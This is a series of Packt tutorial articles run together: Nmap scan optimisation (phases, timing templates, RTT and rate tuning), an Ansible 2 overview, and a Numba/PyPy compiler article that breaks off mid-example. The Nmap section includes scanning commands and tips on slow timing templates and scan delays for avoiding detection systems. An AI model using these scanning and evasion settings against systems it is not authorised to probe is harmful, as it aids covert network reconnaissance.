This recipe explains the process that takes place behind the curtains when scanning, and how to skip certain phases to speed up scans.

How to do it...

To perform a full port scan with the timing template set to aggressive, and without the reverse DNS resolution (-n) or ping (-Pn), use the following command:

# nmap -T4 -n -Pn -p- 74.207.244.221

Note the scanning time at the end of the report:

Nmap scan report for 74.207.244.221
Host is up (0.11s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open ssh
80/tcp   open http
9929/tcp open nping-echo
Nmap done: 1 IP address (1 host up) scanned in 60.84 seconds

Now, compare this with the running time that we get if we don't skip any tests:

# nmap -p- scanme.nmap.org

Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.11s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE
22/tcp   open ssh
80/tcp   open http
9929/tcp open nping-echo
Nmap done: 1 IP address (1 host up) scanned in 77.45 seconds

Although the time difference isn't very drastic, it really adds up when you work with many hosts. I recommend that you think about your objectives and the information you need, and consider the possibility of skipping some of the scanning phases that we will describe next.

How it works...

Nmap scans are divided into several phases. Some of them require certain arguments to be set in order to run, but others, such as the reverse DNS resolution, are executed by default. Let's review the phases that can be skipped and their corresponding Nmap flags:

Target enumeration: In this phase, Nmap parses the target list. This phase can't exactly be skipped, but you can save DNS forward lookups by using only IP addresses as targets.

Host discovery: This is the phase where Nmap establishes whether the targets are online and in the network. By default, Nmap sends an ICMP echo request and some additional probes, but it supports several host discovery techniques that can even be combined.
To skip the host discovery phase (no ping), use the flag -Pn. We can easily see which probes were skipped by comparing the packet traces of the two scans:

$ nmap -Pn -p80 -n --packet-trace scanme.nmap.org
SENT (0.0864s) TCP 106.187.53.215:62670 > 74.207.244.221:80 S ttl=46 id=4184 iplen=44 seq=3846739633 win=1024 <mss 1460>
RCVD (0.1957s) TCP 74.207.244.221:80 > 106.187.53.215:62670 SA ttl=56 id=0 iplen=44 seq=2588014713 win=14600 <mss 1460>
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.11s latency).
PORT   STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

For scanning without skipping host discovery, we use the command:

$ nmap -p80 -n --packet-trace scanme.nmap.org
SENT (0.1099s) ICMP 106.187.53.215 > 74.207.244.221 Echo request (type=8/code=0) ttl=59 id=12270 iplen=28
SENT (0.1101s) TCP 106.187.53.215:43199 > 74.207.244.221:443 S ttl=59 id=38710 iplen=44 seq=1913383349 win=1024 <mss 1460>
SENT (0.1101s) TCP 106.187.53.215:43199 > 74.207.244.221:80 A ttl=44 id=10665 iplen=40 seq=0 win=1024
SENT (0.1102s) ICMP 106.187.53.215 > 74.207.244.221 Timestamp request (type=13/code=0) ttl=51 id=42939 iplen=40
RCVD (0.2120s) ICMP 74.207.244.221 > 106.187.53.215 Echo reply (type=0/code=0) ttl=56 id=2147 iplen=28
SENT (0.2731s) TCP 106.187.53.215:43199 > 74.207.244.221:80 S ttl=51 id=34952 iplen=44 seq=2609466214 win=1024 <mss 1460>
RCVD (0.3822s) TCP 74.207.244.221:80 > 106.187.53.215:43199 SA ttl=56 id=0 iplen=44 seq=4191686720 win=14600 <mss 1460>
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.10s latency).
PORT   STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds

Reverse DNS resolution: Host names often reveal additional information by themselves, and Nmap uses reverse DNS lookups to obtain them. This step can be skipped by adding the argument -n to your scan arguments.
Let's see the traffic generated by the two scans with and without reverse DNS resolution. First, let's skip reverse DNS resolution by adding -n to the command:

$ nmap -n -Pn -p80 --packet-trace scanme.nmap.org
SENT (0.1832s) TCP 106.187.53.215:45748 > 74.207.244.221:80 S ttl=37 id=33309 iplen=44 seq=2623325197 win=1024 <mss 1460>
RCVD (0.2877s) TCP 74.207.244.221:80 > 106.187.53.215:45748 SA ttl=56 id=0 iplen=44 seq=3220507551 win=14600 <mss 1460>
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.10s latency).
PORT   STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds

And now let's try the same command, but without skipping reverse DNS resolution, as follows:

$ nmap -Pn -p80 --packet-trace scanme.nmap.org
NSOCK (0.0600s) UDP connection requested to 106.187.36.20:53 (IOD #1) EID 8
NSOCK (0.0600s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 18
NSOCK (0.0600s) UDP connection requested to 106.187.35.20:53 (IOD #2) EID 24
NSOCK (0.0600s) Read request from IOD #2 [106.187.35.20:53] (timeout: -1ms) EID 34
NSOCK (0.0600s) UDP connection requested to 106.187.34.20:53 (IOD #3) EID 40
NSOCK (0.0600s) Read request from IOD #3 [106.187.34.20:53] (timeout: -1ms) EID 50
NSOCK (0.0600s) Write request for 45 bytes to IOD #1 EID 59 [106.187.36.20:53]: =............221.244.207.74.in-addr.arpa.....
NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 8 [106.187.36.20:53]
NSOCK (0.0600s) Callback: WRITE SUCCESS for EID 59 [106.187.36.20:53]
NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 24 [106.187.35.20:53]
NSOCK (0.0600s) Callback: CONNECT SUCCESS for EID 40 [106.187.34.20:53]
NSOCK (0.0620s) Callback: READ SUCCESS for EID 18 [106.187.36.20:53] (174 bytes)
NSOCK (0.0620s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 66
NSOCK (0.0620s) nsi_delete() (IOD #1)
NSOCK (0.0620s) msevent_cancel() on event #66 (type READ)
NSOCK (0.0620s) nsi_delete() (IOD #2)
NSOCK (0.0620s) msevent_cancel() on event #34 (type READ)
NSOCK (0.0620s) nsi_delete() (IOD #3)
NSOCK (0.0620s) msevent_cancel() on event #50 (type READ)
SENT (0.0910s) TCP 106.187.53.215:46089 > 74.207.244.221:80 S ttl=42 id=23960 iplen=44 seq=1992555555 win=1024 <mss 1460>
RCVD (0.1932s) TCP 74.207.244.221:80 > 106.187.53.215:46089 SA ttl=56 id=0 iplen=44 seq=4229796359 win=14600 <mss 1460>
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.10s latency).
PORT   STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

Port scanning: In this phase, Nmap determines the state of the ports. By default, it uses SYN/TCP Connect scanning depending on the user privileges, but several other port scanning techniques are supported. Although this may not be so obvious, Nmap can do a few different things with targets without port scanning them, such as resolving their DNS names or checking whether they are online.
For this reason, this phase can be skipped with the argument -sn:

$ nmap -sn -R --packet-trace 74.207.244.221
SENT (0.0363s) ICMP 106.187.53.215 > 74.207.244.221 Echo request (type=8/code=0) ttl=56 id=36390 iplen=28
SENT (0.0364s) TCP 106.187.53.215:53376 > 74.207.244.221:443 S ttl=39 id=22228 iplen=44 seq=155734416 win=1024 <mss 1460>
SENT (0.0365s) TCP 106.187.53.215:53376 > 74.207.244.221:80 A ttl=46 id=36835 iplen=40 seq=0 win=1024
SENT (0.0366s) ICMP 106.187.53.215 > 74.207.244.221 Timestamp request (type=13/code=0) ttl=50 id=2630 iplen=40
RCVD (0.1377s) TCP 74.207.244.221:443 > 106.187.53.215:53376 RA ttl=56 id=0 iplen=40 seq=0 win=0
NSOCK (0.1660s) UDP connection requested to 106.187.36.20:53 (IOD #1) EID 8
NSOCK (0.1660s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 18
NSOCK (0.1660s) UDP connection requested to 106.187.35.20:53 (IOD #2) EID 24
NSOCK (0.1660s) Read request from IOD #2 [106.187.35.20:53] (timeout: -1ms) EID 34
NSOCK (0.1660s) UDP connection requested to 106.187.34.20:53 (IOD #3) EID 40
NSOCK (0.1660s) Read request from IOD #3 [106.187.34.20:53] (timeout: -1ms) EID 50
NSOCK (0.1660s) Write request for 45 bytes to IOD #1 EID 59 [106.187.36.20:53]: [............221.244.207.74.in-addr.arpa.....
NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 8 [106.187.36.20:53]
NSOCK (0.1660s) Callback: WRITE SUCCESS for EID 59 [106.187.36.20:53]
NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 24 [106.187.35.20:53]
NSOCK (0.1660s) Callback: CONNECT SUCCESS for EID 40 [106.187.34.20:53]
NSOCK (0.1660s) Callback: READ SUCCESS for EID 18 [106.187.36.20:53] (174 bytes)
NSOCK (0.1660s) Read request from IOD #1 [106.187.36.20:53] (timeout: -1ms) EID 66
NSOCK (0.1660s) nsi_delete() (IOD #1)
NSOCK (0.1660s) msevent_cancel() on event #66 (type READ)
NSOCK (0.1660s) nsi_delete() (IOD #2)
NSOCK (0.1660s) msevent_cancel() on event #34 (type READ)
NSOCK (0.1660s) nsi_delete() (IOD #3)
NSOCK (0.1660s) msevent_cancel() on event #50 (type READ)
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up (0.10s latency).
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds

In the previous example, we can see that an ICMP echo request and a reverse DNS lookup were performed (we forced DNS lookups with the option -R), but no port scanning was done.

There's more...

I recommend that you also run a couple of test scans to measure the speeds of different DNS servers. I've found that ISPs tend to have the slowest DNS servers, but you can make Nmap use different DNS servers by specifying the argument --dns-servers. For example, to use Google's DNS servers, use the following command:

# nmap -R --dns-servers 8.8.8.8,8.8.4.4 -O scanme.nmap.org

You can test your DNS server speed by comparing the scan times. The following command tells Nmap not to ping or port scan, and to only perform a reverse DNS lookup:

$ nmap -R -Pn -sn 74.207.244.221
Nmap scan report for scanme.nmap.org (74.207.244.221)
Host is up.
Nmap done: 1 IP address (1 host up) scanned in 1.01 seconds

To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix: Scanning Phases for more information.
Selecting the correct timing template

Nmap includes six templates that set different timing and performance arguments to optimize your scans based on network conditions. Even though Nmap automatically adjusts some of these values, it is recommended that you set the correct timing template to give Nmap a hint about the speed of your network connection and the target's response time. The following will teach you about Nmap's timing templates and how to choose the most appropriate one.

How to do it...

Open your terminal and type the following command to use the aggressive timing template (-T4). Let's also use debugging (-d) to see what the option -T4 sets:

# nmap -T4 -d 192.168.4.20
--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 500, min 100, max 1250
max-scan-delay: TCP 10, UDP 1000, SCTP 10
parallelism: min 0, max 0
max-retries: 6, host-timeout: 0
min-rate: 0, max-rate: 0
---------------------------------------------
<Scan output removed for clarity>

You may use any of the integers between 0 and 5, for example, -T[0-5].

How it works...

The option -T is used to set the timing template in Nmap. Nmap provides six timing templates to help users tune the timing and performance arguments.
The available timing templates and their initial configuration values are as follows:

Paranoid (-T0)—This template is useful for avoiding detection systems, but it is painfully slow because only one port is scanned at a time, and the timeout between probes is 5 minutes:

--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 300000, min 100, max 300000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 1
max-retries: 10, host-timeout: 0
min-rate: 0, max-rate: 0
---------------------------------------------

Sneaky (-T1)—This template is also useful for avoiding detection systems, but it is still very slow:

--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 15000, min 100, max 15000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 1
max-retries: 10, host-timeout: 0
min-rate: 0, max-rate: 0
---------------------------------------------

Polite (-T2)—This template is used when scanning is not supposed to interfere with the target system; it is a very conservative and safe setting:

--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 1000, min 100, max 10000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 1
max-retries: 10, host-timeout: 0
min-rate: 0, max-rate: 0
---------------------------------------------

Normal (-T3)—This is Nmap's default timing template, which is used when the argument -T is not set:

--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 1000, min 100, max 10000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 0
max-retries: 10, host-timeout: 0
min-rate: 0, max-rate: 0
---------------------------------------------

Aggressive (-T4)—This is the recommended timing template for broadband and Ethernet connections:

--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 500, min 100, max 1250
max-scan-delay: TCP 10, UDP 1000, SCTP 10
parallelism: min 0, max 0
max-retries: 6, host-timeout: 0
min-rate: 0, max-rate: 0
---------------------------------------------

Insane (-T5)—This timing template sacrifices accuracy for speed:

--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 250, min 50, max 300
max-scan-delay: TCP 5, UDP 1000, SCTP 5
parallelism: min 0, max 0
max-retries: 2, host-timeout: 900000
min-rate: 0, max-rate: 0
---------------------------------------------

There's more...

An interactive mode in Nmap allows users to press keys to dynamically change runtime variables, such as verbose, debugging, and packet tracing. Although the discussion of including timing and performance options in the interactive mode has come up a few times on the development mailing list, so far this hasn't been implemented. However, there is an unofficial patch submitted in June 2012 that allows you to change the minimum and maximum packet rate values (--max-rate and --min-rate) dynamically. If you would like to try it out, it's located at http://seclists.org/nmap-dev/2012/q2/883.

Adjusting timing parameters

Nmap not only adjusts itself to different network and target conditions while scanning, but it can also be fine-tuned using timing options to improve performance. Nmap automatically calculates packet round trip, timeout, and delay values, but these values can also be set manually through specific settings. The following describes the timing parameters supported by Nmap.

How to do it...
Enter the following command to adjust the initial round trip timeout, the delay between probes, and a timeout for each scanned host:

# nmap -T4 --scan-delay 1s --initial-rtt-timeout 150ms --host-timeout 15m -d scanme.nmap.org
--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 150, min 100, max 1250
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 0
max-retries: 6, host-timeout: 900000
min-rate: 0, max-rate: 0
---------------------------------------------

How it works...

Nmap supports different timing arguments that can be customized. However, setting these values incorrectly will most likely hurt performance rather than improve it. Let's examine each timing parameter more closely and learn its Nmap option name.

The Round Trip Time (RTT) value is used by Nmap to know when to give up on a probe or retransmit it. Nmap estimates this value by analyzing previous responses, but you can set the initial RTT timeout with the argument --initial-rtt-timeout, as shown in the following command:

# nmap -A -p- --initial-rtt-timeout 150ms <target>

In addition, you can set the minimum and maximum RTT timeout values with --min-rtt-timeout and --max-rtt-timeout, respectively, as shown in the following command:

# nmap -A -p- --min-rtt-timeout 200ms --max-rtt-timeout 600ms <target>

Another very important setting we can control in Nmap is the waiting time between probes. Use the arguments --scan-delay and --max-scan-delay to set the waiting time and the maximum amount of time allowed between probes, respectively, as shown in the following commands:

# nmap -A --max-scan-delay 10s scanme.nmap.org
# nmap -A --scan-delay 1s scanme.nmap.org

Note that the arguments shown previously are very useful for avoiding detection mechanisms. Be careful not to set --max-scan-delay too low, because you will most likely miss ports that are open.

There's more...
If you would like Nmap to give up on a host after a certain amount of time, you can set the argument --host-timeout:

# nmap -sV -A -p- --host-timeout 5m <target>

Estimating round trip times with Nping

To use Nping to estimate the round trip time between you and the target, the following command can be used:

# nping -c30 <target>

This will make Nping send 30 ICMP echo request packets, and after it finishes, it will show the average, minimum, and maximum RTT values obtained:

# nping -c30 scanme.nmap.org
...
SENT (29.3569s) ICMP 50.116.1.121 > 74.207.244.221 Echo request (type=8/code=0) ttl=64 id=27550 iplen=28
RCVD (29.3576s) ICMP 74.207.244.221 > 50.116.1.121 Echo reply (type=0/code=0) ttl=63 id=7572 iplen=28
Max rtt: 10.170ms | Min rtt: 0.316ms | Avg rtt: 0.851ms
Raw packets sent: 30 (840B) | Rcvd: 30 (840B) | Lost: 0 (0.00%)
Tx time: 29.09096s | Tx bytes/s: 28.87 | Tx pkts/s: 1.03
Rx time: 30.09258s | Rx bytes/s: 27.91 | Rx pkts/s: 1.00
Nping done: 1 IP address pinged in 30.47 seconds

Examine the round trip times and use the maximum to set the correct --initial-rtt-timeout and --max-rtt-timeout values. The official documentation recommends using double the maximum RTT value for --initial-rtt-timeout, and as much as four times the maximum RTT value for --max-rtt-timeout.

Displaying the timing settings

Enable debugging to make Nmap report the timing settings before scanning:

$ nmap -d <target>
--------------- Timing report ---------------
hostgroups: min 1, max 100000
rtt-timeouts: init 1000, min 100, max 10000
max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
parallelism: min 0, max 0
max-retries: 10, host-timeout: 0
min-rate: 0, max-rate: 0
---------------------------------------------

To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix: Scanning Phases for more information.
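The rule of thumb above is easy to automate. The following helper (my own utility, not part of Nmap or Nping) parses the "Max rtt" line from Nping's output and suggests the two timeout values in milliseconds:

```python
import re

def recommended_rtt_timeouts(nping_output):
    # Find the maximum RTT reported by Nping, e.g. "Max rtt: 10.170ms"
    match = re.search(r"Max rtt:\s*([\d.]+)ms", nping_output)
    if match is None:
        raise ValueError("no 'Max rtt' line found in the output")
    max_rtt = float(match.group(1))
    # Double the max RTT for --initial-rtt-timeout and quadruple it
    # for --max-rtt-timeout, following the recommendation quoted above
    return {"initial-rtt-timeout": round(2 * max_rtt),
            "max-rtt-timeout": round(4 * max_rtt)}

sample = "Max rtt: 10.170ms | Min rtt: 0.316ms | Avg rtt: 0.851ms"
print(recommended_rtt_timeouts(sample))
```

For the Nping run shown earlier (maximum RTT of 10.170 ms), this suggests roughly 20 ms and 41 ms, which you would pass as --initial-rtt-timeout 20ms --max-rtt-timeout 41ms.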
Adjusting performance parameters

Nmap not only adjusts itself to different network and target conditions while scanning, but it also supports several parameters that affect its behavior, such as the number of hosts scanned concurrently, the number of retries, and the number of allowed probes. Learning how to adjust these parameters properly can cut your scanning time down considerably. The following explains the Nmap parameters that can be adjusted to improve performance.

How to do it...

Enter the following command, adjusting the values for your target condition:

$ nmap --min-hostgroup 100 --max-hostgroup 500 --max-retries 2 <target>

How it works...

The command shown previously tells Nmap to scan and report by grouping no fewer than 100 (--min-hostgroup 100) and no more than 500 hosts (--max-hostgroup 500). It also tells Nmap to retry only twice before giving up on any port (--max-retries 2):

# nmap --min-hostgroup 100 --max-hostgroup 500 --max-retries 2 <target>

It is important to note that setting these values incorrectly will most likely hurt performance or accuracy rather than improve them. Nmap sends many probes during its port scanning phase due to the ambiguity of a lack of response; either the packet got lost, the service is filtered, or the service is not open. By default, Nmap adjusts the number of retries based on network conditions, but you can set this value with the argument --max-retries. By increasing the number of retries, we can improve Nmap's accuracy, but keep in mind that this sacrifices speed:

$ nmap --max-retries 10 <target>

The arguments --min-hostgroup and --max-hostgroup control the number of hosts that we probe concurrently. Keep in mind that reports are also generated based on this value, so adjust it depending on how often you would like to see the scan results.
Larger groups are optimal for performance, but you may prefer smaller host groups on slow networks:

# nmap -A -p- --min-hostgroup 100 --max-hostgroup 500 <target>

There are also very important arguments that can be used to limit the number of packets sent per second by Nmap. The arguments --min-rate and --max-rate need to be used carefully to avoid undesirable effects. These rates are set automatically by Nmap if the arguments are not present:

# nmap -A -p- --min-rate 50 --max-rate 100 <target>

Finally, the arguments --min-parallelism and --max-parallelism can be used to control the number of probes for a host group. By setting these arguments, Nmap will no longer adjust the values dynamically:

# nmap -A --max-parallelism 1 <target>
# nmap -A --min-parallelism 10 --max-parallelism 250 <target>

There's more...

If you would like Nmap to give up on a host after a certain amount of time, you can set the argument --host-timeout, as shown in the following command:

# nmap -sV -A -p- --host-timeout 5m <target>

Interactive mode in Nmap allows users to press keys to dynamically change runtime variables, such as verbose, debugging, and packet tracing. Although the discussion of including timing and performance options in the interactive mode has come up a few times on the development mailing list, so far this hasn't been implemented. However, there is an unofficial patch submitted in June 2012 that allows you to change the minimum and maximum packet rate values (--max-rate and --min-rate) dynamically. If you would like to try it out, it's located at http://seclists.org/nmap-dev/2012/q2/883.

To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix: Scanning Phases for more information.

Summary

In this article, we learned how to optimize scans. Distributing Nmap scans among several clients allows us to save time and take advantage of extra bandwidth and CPU resources.
This article is short but full of tips for optimizing your scans. Prepare to dig deep into Nmap's internals and the timing and performance parameters!
Getting Started with Ansible 2

Packt
23 Jun 2017
5 min read
In this article, by Jonathan McAllister, author of the book, Implementing DevOps with Ansible 2, we will learn what Ansible is, how users can leverage it, its architecture, and the key differentiators that set Ansible apart from other configuration management solutions. We will also look at the organizations that have successfully been able to leverage Ansible. (For more resources related to this topic, see here.)

What is Ansible?

Ansible is a relatively new addition to the DevOps and configuration management space. Its simplicity, structured automation format, and development paradigm have caught the eyes of small and large corporations alike. Organizations as large as Twitter have successfully managed to leverage Ansible for highly scaled deployments and configuration management across thousands of servers simultaneously. And Twitter isn't the only organization that has managed to implement Ansible at scale; other well-known organizations that have successfully leveraged Ansible include Logitech, NASA, NEC, Microsoft, and hundreds more. As it stands today, Ansible is in use by major players around the world, managing thousands of deployments and configuration management solutions worldwide.

Ansible's Automation Architecture

Ansible was created with an incredibly flexible and scalable automation engine. It allows users to leverage it in many diverse ways and can be conformed to the approach that best suits your specific needs. Since Ansible is agentless (meaning there is no permanently running daemon on the systems it manages or executes from), it can be used locally to control a single system (without any network connectivity), or leveraged to orchestrate and execute automation against many systems via a control server. In addition to the aforementioned architectures, Ansible can also be leveraged via Vagrant or Docker to provision infrastructure automatically.
This type of solution basically allows the Ansible user to bootstrap their hardware or infrastructure provisioning by running an Ansible playbook (or playbooks). If you happen to be a Vagrant user, there are instructions within the HashiCorp Ansible provisioning documentation located at https://www.vagrantup.com/docs/provisioning/ansible.html.

Ansible is open source, module based, pluggable, and agentless. These key differentiators from other configuration management solutions give Ansible a significant edge. Let's take a look at each of these differentiators in detail and see what it actually means for Ansible developers and users:

Open source: It is no secret that successful open source solutions are usually extraordinarily feature rich. This is because instead of a simple 8-person (or even 100-person) engineering team, there are potentially thousands of developers. Each development and enhancement has been designed to fit a unique need. As a result, the end deliverable provides the consumers of Ansible with a very well-rounded solution that can be adapted or leveraged in numerous ways.

Module based: Ansible has been developed with the intention of integrating with numerous other open and closed source software solutions. This means that Ansible is currently compatible with multiple flavors of Linux, Windows, and cloud providers. Aside from its OS-level support, Ansible currently integrates with hundreds of other software solutions, including EC2, Jira, Jenkins, Bamboo, Microsoft Azure, DigitalOcean, Docker, Google, and many, many more. For a complete list of Ansible modules, please consult the official module support list located at http://docs.ansible.com/ansible/modules_by_category.html.

Agentless: One of the key differentiators that gives Ansible an edge against the competition is the fact that it is 100% agentless.
This means there are no daemons that need to be installed on remote machines, no firewall ports that need to be opened (besides traditional SSH), no monitoring that needs to be performed on the remote machines, and no management that needs to be performed on the infrastructure fleet. In effect, this makes Ansible very self-sufficient.

Pluggable: While Ansible comes out of the box with a wide spectrum of software integration support, it is oftentimes a requirement to integrate the solution with a company's internal software or with a solution that has not already been integrated into Ansible's robust playbook suite. The answer to such a requirement is to create a plugin-based solution for Ansible, thus providing the custom functionality necessary.

Since Ansible can be implemented in a few different ways, the aim of this section is to highlight these options and help us get familiar with the architecture types that Ansible supports. Generally, the architecture of Ansible can be categorized into three distinct architecture types. These are described next.

Summary

In this article, we discussed the architecture of Ansible and the key differentiators that set Ansible apart from other configuration management solutions. We learned that Ansible can also be leveraged via Vagrant or Docker to provision infrastructure automatically. We also saw that Ansible has been successfully leveraged by large organizations such as Twitter, Microsoft, and many more.
Exploring Compilers

Packt
23 Jun 2017
17 min read
In this article by Gabriele Lanaro, author of the book, Python High Performance - Second Edition, we will see that Python is a mature and widely used language, and there is a large interest in improving its performance by compiling functions and methods directly to machine code rather than executing instructions in the interpreter. In this article, we will explore two projects--Numba and PyPy--that approach compilation in a slightly different way. Numba is a library designed to compile small functions on the fly. Instead of transforming Python code to C, Numba analyzes and compiles Python functions directly to machine code. PyPy is a replacement interpreter that works by analyzing the code at runtime and optimizing the slow loops automatically. (For more resources related to this topic, see here.)

Numba

Numba was started in 2012 by Travis Oliphant, the original author of NumPy, as a library for compiling individual Python functions at runtime using the Low-Level Virtual Machine (LLVM) toolchain. LLVM is a set of tools designed for writing compilers. LLVM is language agnostic and is used to write compilers for a wide range of languages (an important example is the clang compiler). One of the core aspects of LLVM is the intermediate representation (the LLVM IR), a very low-level, platform-agnostic language similar to assembly that can be compiled to machine code for the specific target platform.

Numba works by inspecting Python functions and by compiling them, using LLVM, to the IR. As we have already seen in the last article, speed gains can be obtained when we introduce types for variables and functions. Numba implements clever algorithms to guess the types (this is called type inference) and compiles type-aware versions of the functions for fast execution. Note that Numba was developed to improve the performance of numerical code. The development efforts often prioritize the optimization of applications that intensively use NumPy arrays.
Numba is evolving really fast and can have substantial improvements between releases and, sometimes, backward-incompatible changes. To keep up, ensure that you refer to the release notes for each version. In the rest of this article, we will use Numba version 0.30.1; ensure that you install the correct version to avoid any errors. The complete code examples in this article can be found in the Numba.ipynb notebook.

First steps with Numba

Getting started with Numba is fairly straightforward. As a first example, we will implement a function that calculates the sum of squares of an array. The function definition is as follows:

    def sum_sq(a):
        result = 0
        N = len(a)
        for i in range(N):
            result += a[i]**2
        return result

To set up this function with Numba, it is sufficient to apply the nb.jit decorator:

    import numba as nb

    @nb.jit
    def sum_sq(a):
        ...

The nb.jit decorator won't do much when applied. However, when the function is invoked for the first time, Numba will detect the type of the input argument, a, and compile a specialized, performant version of the original function. To measure the performance gain obtained by the Numba compiler, we can compare the timings of the original and the specialized functions. The original, undecorated function can be easily accessed through the py_func attribute. The timings for the two functions are as follows:

    import numpy as np
    x = np.random.rand(10000)

    # Original
    %timeit sum_sq.py_func(x)
    100 loops, best of 3: 6.11 ms per loop

    # Numba
    %timeit sum_sq(x)
    100000 loops, best of 3: 11.7 µs per loop

You can see how the Numba version is orders of magnitude faster than the Python version. We can also compare how this implementation stacks up against NumPy standard operators:

    %timeit (x**2).sum()
    10000 loops, best of 3: 14.8 µs per loop

In this case, the Numba-compiled function is marginally faster than NumPy vectorized operations.
The reason for the extra speed of the Numba version is likely that the NumPy version allocates an extra array before performing the sum, in comparison with the in-place operations performed by our sum_sq function. As we didn't use array-specific methods in sum_sq, we can also try to apply the same function to a regular Python list of floating point numbers. Interestingly, Numba is able to obtain a substantial speed up even in this case, as compared to a list comprehension:

    x_list = x.tolist()
    %timeit sum_sq(x_list)
    1000 loops, best of 3: 199 µs per loop

    %timeit sum([x**2 for x in x_list])
    1000 loops, best of 3: 1.28 ms per loop

Considering that all we needed to do was apply a simple decorator to obtain an incredible speed up over different data types, it's no wonder that what Numba does looks like magic.

Type specializations

As shown earlier, the nb.jit decorator works by compiling a specialized version of the function once it encounters a new argument type. To better understand how this works, we can inspect the decorated function in the sum_sq example. Numba exposes the specialized types through the signatures attribute. Right after the sum_sq definition, we can inspect the available specializations by accessing sum_sq.signatures, as follows:

    sum_sq.signatures
    # Output:
    # []

If we call this function with a specific argument, for instance, an array of float64 numbers, we can see how Numba compiles a specialized version on the fly.
If we also apply the function to an array of float32 numbers, we can see how a new entry is added to the sum_sq.signatures list:

    x = np.random.rand(1000).astype('float64')
    sum_sq(x)
    sum_sq.signatures
    # Result:
    # [(array(float64, 1d, C),)]

    x = np.random.rand(1000).astype('float32')
    sum_sq(x)
    sum_sq.signatures
    # Result:
    # [(array(float64, 1d, C),), (array(float32, 1d, C),)]

It is possible to explicitly compile the function for certain types by passing a signature to the nb.jit function. An individual signature can be passed as a tuple that contains the types we would like to accept. Numba provides a great variety of types that can be found in the nb.types module, and they are also available in the top-level nb namespace. If we want to specify an array of a specific type, we can use the slicing operator, [:], on the type itself. In the following example, we demonstrate how to declare a function that takes an array of float64 as its only argument:

    @nb.jit((nb.float64[:],))
    def sum_sq(a):

Note that when we explicitly declare a signature, we are prevented from using other types, as demonstrated in the following example. If we try to pass the array x as float32, Numba will raise a TypeError:

    sum_sq(x.astype('float32'))
    # TypeError: No matching definition for argument type(s) array(float32, 1d, C)

Another way to declare signatures is through type strings. For example, a function that takes a float64 as input and returns a float64 as output can be declared with the float64(float64) string. Array types can be declared using the [:] suffix. To put this together, we can declare a signature for our sum_sq function, as follows:

    @nb.jit("float64(float64[:])")
    def sum_sq(a):

You can also pass multiple signatures by passing a list:

    @nb.jit(["float64(float64[:])", "float64(float32[:])"])
    def sum_sq(a):

Object mode versus native mode

So far, we have shown how Numba behaves when handling a fairly simple function.
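To make the idea of per-type specialization more concrete, here is a small pure-Python sketch of a dispatch cache keyed on argument types. This is an illustrative toy, not Numba's actual machinery (Numba compiles each specialization to machine code via LLVM; this sketch merely records one variant per type signature):

```python
def specialize(func):
    """Toy decorator: keep one 'specialized' variant per argument-type tuple."""
    cache = {}

    def wrapper(*args):
        sig = tuple(type(a) for a in args)
        if sig not in cache:
            # A real JIT would compile a type-specific version here;
            # we simply record the signature the first time we see it.
            cache[sig] = func
        return cache[sig](*args)

    wrapper.signatures = cache  # mimic Numba's .signatures attribute
    return wrapper

@specialize
def sum_sq(a):
    result = 0
    for x in a:
        result += x * x
    return result

print(sum_sq([1.0, 2.0, 3.0]))  # 14.0, cached under the (list,) signature
print(sum_sq((1, 2, 3)))        # 14, a second entry under (tuple,)
print(len(sum_sq.signatures))   # 2
```

Just as with the real decorator, the cache starts empty and grows only when the function is called with a type it has not seen before.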
In this case, Numba worked exceptionally well, and we obtained great performance on arrays and lists. The degree of optimization obtainable from Numba depends on how well Numba is able to infer the variable types and how well it can translate those standard Python operations to fast type-specific versions. If this happens, the interpreter is side-stepped and we can get performance gains similar to those of Cython. When Numba cannot infer variable types, it will still try to compile the code, reverting to the interpreter when the types can't be determined or when certain operations are unsupported. In Numba, this is called object mode and is in contrast to the interpreter-free scenario, called native mode.

Numba provides a function, called inspect_types, that helps us understand how effective the type inference was and which operations were optimized. As an example, we can take a look at the types inferred for our sum_sq function:

    sum_sq.inspect_types()

When this function is called, Numba will print the type inferred for each specialized version of the function. The output consists of blocks that contain information about variables and the types associated with them. For example, we can examine the N = len(a) line:

    # --- LINE 4 ---
